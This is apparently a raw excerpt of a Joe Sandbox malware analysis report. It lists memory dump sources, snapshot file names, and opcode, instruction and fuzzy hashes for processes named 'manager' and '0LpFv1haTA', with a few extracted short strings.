• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c608969d31e8093720f51d7c3f2a3627bb5f4b6b5ee496c27475a59de9d4274
• Instruction ID: 3db1ef1c2b6b599ab7683767acc581c25b5162b57fa54014bf79207eee148b1f
• Opcode Fuzzy Hash: 1c608969d31e8093720f51d7c3f2a3627bb5f4b6b5ee496c27475a59de9d4274
• Instruction Fuzzy Hash: 353129B4D0021A9FCF05DFA8D9808EEBBB5FF49310B4185AAE451BB261D730A946CF90
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e8ba4ca945c01482abbe70ee7ca02b7d04de923eeb92d91a6ebcc09e7f13d4a7
• Instruction ID: 48e6f2e005e499e5940e66b2f1729cdb3632a9907dd44120ce84c6ee5ddb51b8
• Opcode Fuzzy Hash: e8ba4ca945c01482abbe70ee7ca02b7d04de923eeb92d91a6ebcc09e7f13d4a7
• Instruction Fuzzy Hash: EF21F8B1D0021A9FCF05DFA8D9809DDBBB5FF49310F40869AD454BB255DB31AA46CF90
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 28f488b1fa999e077d8f9e11e94b277af9b08767fe0d564b6e7039ee6f132e4e
• Instruction ID: 1e7a5a5aab25382a8c9fec6da57e284539957fde7dae143d0ccaa079a179616f
• Opcode Fuzzy Hash: 28f488b1fa999e077d8f9e11e94b277af9b08767fe0d564b6e7039ee6f132e4e
• Instruction Fuzzy Hash: E921E6B0E0025A9FCF05DFA8DA809DDBBB1FF49300F51869AD454BB251DB30AA46CB90
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb4c5596f40bea8a196dfefb4335c6bfd6307abb1a03fda15717a81b7d1f68c3
• Instruction ID: 7431cd2df0d8f00a0b7bfbfc512254dc9fa77813a67ab1a3fa1c5d37ad6c6875
• Opcode Fuzzy Hash: eb4c5596f40bea8a196dfefb4335c6bfd6307abb1a03fda15717a81b7d1f68c3
• Instruction Fuzzy Hash: 4B213971D0025A9FCF05DFA8D8409DDBBB5FF49310F55819AD860BB351EB30A946CB94
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 60a0b2fc3f1a39c11056b45a3cad0b1dcd9ed31f1e70a2145ec90cb53fae1d8d
• Instruction ID: 2febb55d0973386888bd9cb116e239c15cd9a3feea26d1410f1fe70e7db369c9
• Opcode Fuzzy Hash: 60a0b2fc3f1a39c11056b45a3cad0b1dcd9ed31f1e70a2145ec90cb53fae1d8d
• Instruction Fuzzy Hash: BD213971D0011A9FCF05DFA9D8409DDBBB5FF49310F4192AAD411BB261DB30A986CF90
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c5b94431188ccdd43e530ebef726998f4cc98b38829d485a32d93eb97e6efbad
• Instruction ID: 2670cf0bfeb1603c3367e7948fed170bebbbe31ea972104a5ddd8971cf61c740
• Opcode Fuzzy Hash: c5b94431188ccdd43e530ebef726998f4cc98b38829d485a32d93eb97e6efbad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C711E631A042199FCB14DF64C8489DEFBF7EB8C310F1981AAD456A7212DB316D56CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ef15989fa2e03d7cb778e49dcbf849ecb019e6ac606a65462f554e7f12f594cb
                                                                                                                                                                                                  • Instruction ID: 8b925a08f82ebd1b44d2a3f37790c5d69a51dfdabaa2b05f0cdc7663ed3498cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef15989fa2e03d7cb778e49dcbf849ecb019e6ac606a65462f554e7f12f594cb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B611C132B042199FDB15DB64C8409AEFBFBAB88710F1881BAD446A7242DB70AD568790
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4563083619.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_168d000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4fcea5f21afc8f181768e4e86a15885b67419fd29a88c30c2bddb7a4a4647970
                                                                                                                                                                                                  • Instruction ID: da9caf17a0964540fa41b309f4dc5951e8b4420627733acbfbb594aebc879102
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fcea5f21afc8f181768e4e86a15885b67419fd29a88c30c2bddb7a4a4647970
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C012B71108300AAF720AA99CCC0767BFACDF41331F08C61AED485A3C7C7789845C671
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 42eed79a16fe480c967012eb11153bae7bb8c608ac8f042ca88c066454c9ae98
                                                                                                                                                                                                  • Instruction ID: c5cffdeeeae07dbe6ae8b81caebb619d1d19eb71c7e632ece9630b9c7170d482
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42eed79a16fe480c967012eb11153bae7bb8c608ac8f042ca88c066454c9ae98
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C018BB4C1421AAECF14CF96D900AFEFBF4AB8A311F04942AC016B6240D3796659CF90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f36166202a27502f8c2e3ce11a611aeb0d5aaf6a7930ecd16a4f0cc3092d1c0a
                                                                                                                                                                                                  • Instruction ID: ba39c7e63d9d6aeffad7b8ac75aea48a300497ea35dbfd486c78a3e2330669f0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f36166202a27502f8c2e3ce11a611aeb0d5aaf6a7930ecd16a4f0cc3092d1c0a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F012C70A01109EFCB05DF68DA8099DFFB1EF49304F14D2E5E4086B221D7719E96DB81
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b4a48fa6191515ebbaa7e5421e17d9e55db41f4d04a64e5c89e69ba621247f30
                                                                                                                                                                                                  • Instruction ID: a85fd3a628bd17174abff0c87c3914a6116d82347c0f7a0cd7718805e8d2a5c6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4a48fa6191515ebbaa7e5421e17d9e55db41f4d04a64e5c89e69ba621247f30
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79F0C872910205EBDF14DB60CC55AEFBBB2AF44310F154829D402A7241DF714946DB82
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4563083619.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_168d000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7e4797370c39f385fd2f0415e1f683088e09e9a635229e5c6d3eb0fe43656fa4
                                                                                                                                                                                                  • Instruction ID: b9d6553dc0fb1e632e93a3a7f6d7ad03f9f8e6d67ba663991ed346b946148fce
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e4797370c39f385fd2f0415e1f683088e09e9a635229e5c6d3eb0fe43656fa4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43F0C2714043409EF7209A4ADCC4B62FF98EF40635F18C15AED485A3C7C3799844CAB0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 028e99ebe675b83e559af055cd0e88f49b16411b4332e5254fbf5edcad430bf4
                                                                                                                                                                                                  • Instruction ID: 10e7c629e61e4957c851d3d303d9b14e9daa6e8fffcf0fb481be1864d0eb0b35
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 028e99ebe675b83e559af055cd0e88f49b16411b4332e5254fbf5edcad430bf4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5F09A31A08240AFC715CB19D844DAABFF6EFC6220719C09BE858CB217DA319865CB21
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: afa00a657b5dbe11dd25c102a5afb27c339fc1e3e8123371d9668e75fedc81fe
                                                                                                                                                                                                  • Instruction ID: 6ccb53ead1556aacada93576e642a36a31e03e33443959f89d2a26672bb95038
                                                                                                                                                                                                  • Opcode Fuzzy Hash: afa00a657b5dbe11dd25c102a5afb27c339fc1e3e8123371d9668e75fedc81fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8BF0E770C0121ADFCB15DFA8D945A9DBBF4FB45304F1045AAC415AB260EB719A45CF80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 97687ebf112c568d42c89af4d6b03a5b53153feff005a6af32b2efc86fb8e2b2
                                                                                                                                                                                                  • Instruction ID: 381aa6fa61ef349f3dac12c630ccf1b3d7457192c499974b73124049b0911406
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97687ebf112c568d42c89af4d6b03a5b53153feff005a6af32b2efc86fb8e2b2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9E030357142146B8714DA0AD840D6BBBEAEBC9260714C15AF858C7305DB31EC518790
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b30b3013c4badb18778ef4155c17859fa603651f6076d1b33cdacde0ca233f07
• Instruction ID: cdd9bcb7009ac072a13af6f6ce12fd755fad7caf3f1e4b82cb27bcccc9d6b2f6
• Opcode Fuzzy Hash: b30b3013c4badb18778ef4155c17859fa603651f6076d1b33cdacde0ca233f07
• Instruction Fuzzy Hash: 77F0D4B0E146288FCB28DF5AD844AE9FBF1AFCA350F5591E5C01DAB261D6309D81CF01
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 190068d0d9b227b7d9bfce319e71c306721634945c6267319f03187ef2627d97
• Instruction ID: e626d118a7154d6218956665e95fe8ed3f985c1ad7ff571713a9194ca6bc8bdd
• Opcode Fuzzy Hash: 190068d0d9b227b7d9bfce319e71c306721634945c6267319f03187ef2627d97
• Instruction Fuzzy Hash: 0CF0B270C0121AEFCB54EFA8D944AAEBBB4FB05304F5086AAC416A7350EB719A45CF80
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3a28705e7bd7ceb7ce87bffa02ee9fe89eb6f5abf73906f9b3d90cd96dfb902e
• Instruction ID: 0ee95dbfec2ebde0f0afcc1c04563ee624ea555c1ca5b722b03b778e279517f8
• Opcode Fuzzy Hash: 3a28705e7bd7ceb7ce87bffa02ee9fe89eb6f5abf73906f9b3d90cd96dfb902e
• Instruction Fuzzy Hash: 3DE09234545204EFC714CFA5C641A5CBBF1EF05314F24D6D8940827355C332EE82CB40
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7438c116f0b4c670b4aaa36d0265e354af3058eacc7ecbcfa70891a6720ca7bd
• Instruction ID: 69e1a857524fe8dc671789a9ee893f4e8c46942f604369ca35fc467f850bfe48
• Opcode Fuzzy Hash: 7438c116f0b4c670b4aaa36d0265e354af3058eacc7ecbcfa70891a6720ca7bd
• Instruction Fuzzy Hash: 42E0E5B4E00258DBCF28CF9AD8808ACBBB1FFC5324B009165D115AB264D6709912CB40
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cc21b03af90a8814feb86e9e7385b864c66679bb5a7bd0743fa6468de5b4ac2f
• Instruction ID: 8a299c0e0d8df64cea19ec89123428fab2dcc0c193f3060a6b13f1057b9717c8
• Opcode Fuzzy Hash: cc21b03af90a8814feb86e9e7385b864c66679bb5a7bd0743fa6468de5b4ac2f
• Instruction Fuzzy Hash: A2E08674D14118CBDB68CF99D8504FCB7B0EFC9320F10A595C006B7250C6319E528F50
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b02ecb5236a36f61190ba638c5332f556c3ba207ac0a79ce7dc9b9214781832c
• Instruction ID: 3444bea10c34b27c6da0109710af78339960489a25fb87931e41b0af01651b7e
• Opcode Fuzzy Hash: b02ecb5236a36f61190ba638c5332f556c3ba207ac0a79ce7dc9b9214781832c
• Instruction Fuzzy Hash: B3E0B674E142199BCB28DFAAD8904ACB771BFC5224F10A26AC469BB251CB309952CF55
Strings
Memory Dump Source
• Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
Similarity
• API ID:
• String ID: dwq
• API String ID: 0-1204298229
• Opcode ID: 473fdcbfb37e7c4902ce9570d3fe3401a05d68e95eb2e1a2f7ec993e05dcec24
• Instruction ID: f7e58398d0d74df0d812a91f31cc21d0556ff85c7cfae5e462c9bb248f254992
• Opcode Fuzzy Hash: 473fdcbfb37e7c4902ce9570d3fe3401a05d68e95eb2e1a2f7ec993e05dcec24
• Instruction Fuzzy Hash: 3F827074A002698FCB24DFA8D994BD9B7B1FF49304F1095AAD409BB365DB30AE85CF50
Strings
Memory Dump Source
• Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
Similarity
• API ID:
• String ID: LRsq
• API String ID: 0-3165563352
• Opcode ID: b4c3398eb08057e1243f0b13f7854cf7fbda2b3a7fa127126c0860525157849a
• Instruction ID: 747b341ae5fa2ef0224d1edc5a7ae9f1ec3dff94913829c50e315e9d2579a8c5
• Opcode Fuzzy Hash: b4c3398eb08057e1243f0b13f7854cf7fbda2b3a7fa127126c0860525157849a
• Instruction Fuzzy Hash: 7D41C3708053499FCB06EFA8E89479D7FB1FF46304F00599AD400EB2A6DB705E45DBA2
Strings
Memory Dump Source
• Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
Similarity
• API ID:
• String ID: LRsq
• API String ID: 0-3165563352
• Opcode ID: 3931366e21b389ccdfa4ff95a73d127b8f293261df06f8235f4c805abf4955dc
• Instruction ID: 556c50cce5c450a3d6865f443212cbc173eee67da1aecd7b3ddabb1e924bb6ea
• Opcode Fuzzy Hash: 3931366e21b389ccdfa4ff95a73d127b8f293261df06f8235f4c805abf4955dc
• Instruction Fuzzy Hash: 783192709057499FCB06FFA8E89078D7FB1FB46308F0059AAD004EB2A6DB705D49CBA1
Strings
Memory Dump Source
• Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
Similarity
• API ID:
• String ID: LRsq
• API String ID: 0-3165563352
• Opcode ID: bacf4b50ce7ce637d1d10c5b96049ad477a84c1e0c5b10918acc9e168a252a39
• Instruction ID: 17cf736d11f4b58730e000c0ce3e0befd8ef1339ff3192b9e00779b8e53784c0
• Opcode Fuzzy Hash: bacf4b50ce7ce637d1d10c5b96049ad477a84c1e0c5b10918acc9e168a252a39
• Instruction Fuzzy Hash: 573181709057499FCB06FFA8E89078D7FB1FB46304F0059AAD000EB2A6DB705D49CBA1
Strings
Memory Dump Source
• Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
Similarity
• API ID:
• String ID: LRsq
• API String ID: 0-3165563352
• Opcode ID: 4bb547c7727c367a7442249f1b92dd05d8ed82184ab4b58ca2fe12fe3fdf6d28
• Instruction ID: 434c54793de27d0cdb48d6c28a3653d1849a36d14f6cd28ad44a4879e96d018e
• Opcode Fuzzy Hash: 4bb547c7727c367a7442249f1b92dd05d8ed82184ab4b58ca2fe12fe3fdf6d28
• Instruction Fuzzy Hash: 5931A4709057499FCB06FFA8E89479D7FB1FB45304F0049AAD404EB2A6EB705E45CBA1
Strings
Memory Dump Source
• Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
Similarity
• API ID:
• String ID: LRsq
• API String ID: 0-3165563352
• Opcode ID: 5fc95ace92da163e89a89bcb2968b6b4b8880a3f491b46f8a9af4f295f703457
• Instruction ID: 047c0d376414b70ff53fad52d1d53371074f82507484fcdb7db49fe934d98a39
• Opcode Fuzzy Hash: 5fc95ace92da163e89a89bcb2968b6b4b8880a3f491b46f8a9af4f295f703457
• Instruction Fuzzy Hash: A6215CB09006099FCB05FFA8E894B9DBBB1FB45308F005968E405EB365EB705E85DFA1
Memory Dump Source
• Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2da5a6908ed48b79823d6b3152d06ce2eb4104c9378350fb293c873102c7b210
                                                                                                                                                                                                  • Instruction ID: 47e3cb01f615b70eaf0276d9be1771e9259309cc6bc14a5bcc75c98fcb193011
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2da5a6908ed48b79823d6b3152d06ce2eb4104c9378350fb293c873102c7b210
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC212871D0424A9FCF01DFA9D4509DDBBB1EF49310F4582AAD451BB2A2DB70AD8ACF60
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7e026be73b1122b13c77c93cf03100f8ea6f7b13ddb24fc1f69feefc521a4b74
                                                                                                                                                                                                  • Instruction ID: a2344eefe5d260b1196b45df7525e24e81133da6584b2cabe727aa79f5889f22
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e026be73b1122b13c77c93cf03100f8ea6f7b13ddb24fc1f69feefc521a4b74
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80014B74C092499ACF01CFA6D4247EDBBF0EB8A314F1460AAD454B6261D7794A0ADF64
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 374b99e0b6339498284df43b9d2d5dbb6d864ff02f39eb8c3cce114e1af77e3c
                                                                                                                                                                                                  • Instruction ID: 179bad109063d4acc13544e294b2f2eb67a8950d7e08de5cb31c8689fba52963
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 374b99e0b6339498284df43b9d2d5dbb6d864ff02f39eb8c3cce114e1af77e3c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F0FF70C00219DFCB44EFB8C851AEDBBB0FF09304F108AAAC415A73A0EB708A45CB81
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c70bb00c6d61c6c22a6ba0dfbfd865a1b6d4bbd1873b8c8f137a8affcc1d3b62
                                                                                                                                                                                                  • Instruction ID: ed0b39ab2d0edbb6f3b57a43b4f36bb4001a29db5032a33c16e64c29ac215355
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c70bb00c6d61c6c22a6ba0dfbfd865a1b6d4bbd1873b8c8f137a8affcc1d3b62
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7F0AF70C00219DFCB44EFA8D940AAEBBB4FF05304F1046AAD415A7350EB719A44CB90
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: rS_H
                                                                                                                                                                                                  • API String ID: 0-3417092059
                                                                                                                                                                                                  • Opcode ID: 135c595ca34c6b841b3280852e265503849b59965ed5b0d6b67372dc544aecc9
                                                                                                                                                                                                  • Instruction ID: 17eb513fa68e5dadc00b3640f57bfee1fb0d5d5dd611b302ffd403a4c8a15755
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 135c595ca34c6b841b3280852e265503849b59965ed5b0d6b67372dc544aecc9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD02D870A1DA8A5FEB95FB2C98546B63BE2FF9A340F0401BAD44DC71D6DE28AC41C750
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f35f58bb4a9c19daadf32ec8da93a1cd16429b269c571552e4b71cad17251c38
                                                                                                                                                                                                  • Instruction ID: 1f4e2982a52d35dfed61cc977e2a348690d1c2a532b37c9c7c56a2cce4b33463
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f35f58bb4a9c19daadf32ec8da93a1cd16429b269c571552e4b71cad17251c38
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76624E70A1C94A8FDB85EF2CD494AA937E2FF59344F1401BAE44ECB296DE25EC42C750
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
